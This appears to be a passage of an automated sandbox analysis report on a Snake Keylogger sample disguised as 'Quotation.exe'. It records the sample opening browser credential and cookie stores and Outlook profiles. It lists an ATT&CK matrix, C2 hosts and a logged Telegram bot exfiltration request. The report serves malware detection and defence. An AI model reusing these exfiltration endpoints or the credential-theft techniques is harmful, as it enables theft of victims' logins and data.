                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594613Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 593985Jump to behavior
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4104411701.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                          Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: C:\Users\user\Desktop\Quotation.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Quotation.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR
                          Source: Yara matchFile source: Quotation.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                          Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Yara matchFile source: Quotation.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Quotation.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR
                          Source: Yara matchFile source: Quotation.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          Query Registry
                          Remote Services1
                          Email Collection
                          1
                          Web Service
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                          Virtualization/Sandbox Evasion
                          LSASS Memory1
                          Security Software Discovery
                          Remote Desktop Protocol11
                          Archive Collected Data
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Deobfuscate/Decode Files or Information
                          Security Account Manager1
                          Process Discovery
                          SMB/Windows Admin Shares1
                          Data from Local System
                          3
                          Ingress Tool Transfer
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                          Obfuscated Files or Information
                          NTDS31
                          Virtualization/Sandbox Evasion
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets1
                          Application Window Discovery
                          SSHKeylogging14
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                          System Network Configuration Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                          System Information Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          Quotation.exe71%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                          Quotation.exe71%VirustotalBrowse
                          Quotation.exe100%AviraHEUR/AGEN.1307591
                          Quotation.exe100%Joe Sandbox ML
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          mail.electradubai.com0%VirustotalBrowse
                          reallyfreegeoip.org0%VirustotalBrowse
                          api.telegram.org2%VirustotalBrowse
                          checkip.dyndns.com0%VirustotalBrowse
                          checkip.dyndns.org0%VirustotalBrowse
                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          http://checkip.dyndns.org0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          http://varders.kozow.com:80810%URL Reputationsafe
                          http://aborters.duckdns.org:8081100%URL Reputationmalware
                          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                          http://checkip.dyndns.org/0%URL Reputationsafe
                          http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                          https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                          http://anotherarmy.dns.army:8081100%URL Reputationmalware
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                          http://checkip.dyndns.org/q0%URL Reputationsafe
                          https://reallyfreegeoip.org0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                          https://www.office.com/lB0%VirustotalBrowse
                          https://api.telegram.org1%VirustotalBrowse
                          https://api.telegram.org/bot4%VirustotalBrowse
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
                          https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                          https://www.office.com/0%VirustotalBrowse
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a2%VirustotalBrowse
                          http://mail.electradubai.com0%VirustotalBrowse
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          mail.electradubai.com
                          192.250.231.25
                          truetrueunknown
                          reallyfreegeoip.org
                          188.114.96.3
                          truetrueunknown
                          api.telegram.org
                          149.154.167.220
                          truetrueunknown
                          checkip.dyndns.com
                          132.226.247.73
                          truefalseunknown
                          checkip.dyndns.org
                          unknown
                          unknowntrueunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.33false
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://duckduckgo.com/chrome_newtabQuotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/ac/?q=Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.orgQuotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoQuotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://api.telegram.org/botQuotation.exefalseunknown
                            https://www.office.com/lBQuotation.exe, 00000000.00000002.4104956397.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.orgQuotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://chrome.google.com/webstore?hl=enQuotation.exe, 00000000.00000002.4104956397.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://www.ecosia.org/newtab/Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://varders.kozow.com:8081Quotation.exefalse
                            • URL Reputation: safe
                            unknown
                            http://aborters.duckdns.org:8081Quotation.exetrue
                            • URL Reputation: malware
                            unknown
                            https://ac.ecosia.org/autocomplete?q=Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://51.38.247.67:8081/_send_.php?LQuotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20aQuotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://reallyfreegeoip.org/xml/8.46.123.33$Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A09000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://anotherarmy.dns.army:8081Quotation.exetrue
                            • URL Reputation: malware
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchQuotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/qQuotation.exefalse
                            • URL Reputation: safe
                            unknown
                            https://chrome.google.com/webstore?hl=enlBQuotation.exe, 00000000.00000002.4104956397.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://reallyfreegeoip.orgQuotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://mail.electradubai.comQuotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedQuotation.exefalse
                              • URL Reputation: safe
                              unknown
                              https://reallyfreegeoip.org/xml/Quotation.exefalse
                              • URL Reputation: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              149.154.167.220
                              api.telegram.orgUnited Kingdom
                              62041TELEGRAMRUtrue
                              188.114.96.3
                              reallyfreegeoip.orgEuropean Union
                              13335CLOUDFLARENETUStrue
                              192.250.231.25
                              mail.electradubai.comUnited States
                              36454CNSV-LLCUStrue
                              132.226.247.73
                              checkip.dyndns.comUnited States
                              16989UTMEMUSfalse
